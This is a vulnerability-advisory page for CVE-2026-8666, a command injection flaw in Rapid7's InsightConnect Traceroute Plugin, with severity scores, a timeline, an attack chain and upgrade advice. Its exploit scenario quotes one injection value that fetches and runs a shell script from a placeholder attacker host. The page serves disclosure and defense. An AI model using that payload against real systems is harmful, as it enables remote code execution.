Skip to main content

InsightConnect Traceroute Plugin CVE-2026-8666

| EUVDEUVD-2026-39161 CRITICAL
OS Command Injection (CWE-78)
2026-06-25 rapid7 GHSA-5854-xw4j-hrh6
9.8
CVSS 3.1 · NVD
Share

Severity by source

Vendor (rapid7) PRIMARY
HIGH
qualitative
NVD
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.8 HIGH

Command injection yields full impact, but invoking the plugin action realistically needs authenticated workflow access, so PR:L rather than the vendor's PR:N; network-reachable and low-complexity.

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (rapid7).

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

8
Analysis Updated
Jun 29, 2026 - 19:43 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 29, 2026 - 19:43 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 29, 2026 - 19:37 vuln.today
cvss_changed
Severity Changed
Jun 29, 2026 - 19:37 NVD
HIGH CRITICAL
CVSS changed
Jun 29, 2026 - 19:37 NVD
7.7 (HIGH) 9.8 (CRITICAL)
Patch available
Jun 25, 2026 - 03:01 EUVD
Analysis Generated
Jun 25, 2026 - 02:17 vuln.today
CVE Published
Jun 25, 2026 - 01:35 cve.org
HIGH 7.7

DescriptionNVD

OS Command Injection vulnerability in the traceroute action of Rapid7 InsightConnect Traceroute Plugin on Linux allows remote attackers to execute arbitrary OS commands via the host, port, max_ttl, count, or time_out request parameters due to insufficient input validation when constructing shell commands.

AnalysisAI

OS command injection in Rapid7's InsightConnect Traceroute Plugin (Linux, versions below 1.0.3) lets attackers inject arbitrary shell commands through the traceroute action's host, port, max_ttl, count, or time_out parameters, which are concatenated into a shell command without sufficient validation. Successful exploitation grants full command execution in the plugin container with the same impact on confidentiality, integrity, and availability. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach plugin traceroute action
Delivery
Inject shell metacharacters via host/port params
Exploit
Break out of traceroute command
Execution
Execute arbitrary OS commands
Impact
Control plugin container

Vulnerability AssessmentAI

Exploitation Exploitation requires reaching the Traceroute Plugin's 'traceroute' action and controlling at least one of the host, port, max_ttl, count, or time_out request parameters; the plugin must be the vulnerable version (below 1.0.3) and running on Linux. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals conflict and warrant scrutiny. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who can supply input to the Traceroute Plugin's action - for example by influencing a workflow field that feeds the 'host' parameter - submits a value such as '8.8.8.8; curl http://attacker/x | sh', which breaks out of the traceroute command and executes attacker-chosen commands in the plugin container. With AC:L the injection is straightforward and requires no special timing, though no public proof-of-concept is currently identified.
Remediation Upgrade the InsightConnect Traceroute Plugin to version 1.0.3 or later, which contains the vendor fix (versions below 1.0.3 are vulnerable); the patched plugin is available from the Rapid7 extension page at https://extensions.rapid7.com/extension/traceroute. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all systems running InsightConnect Traceroute Plugin versions below 1.0.3 and evaluate business impact; restrict network access to affected instances if possible. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-8666 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy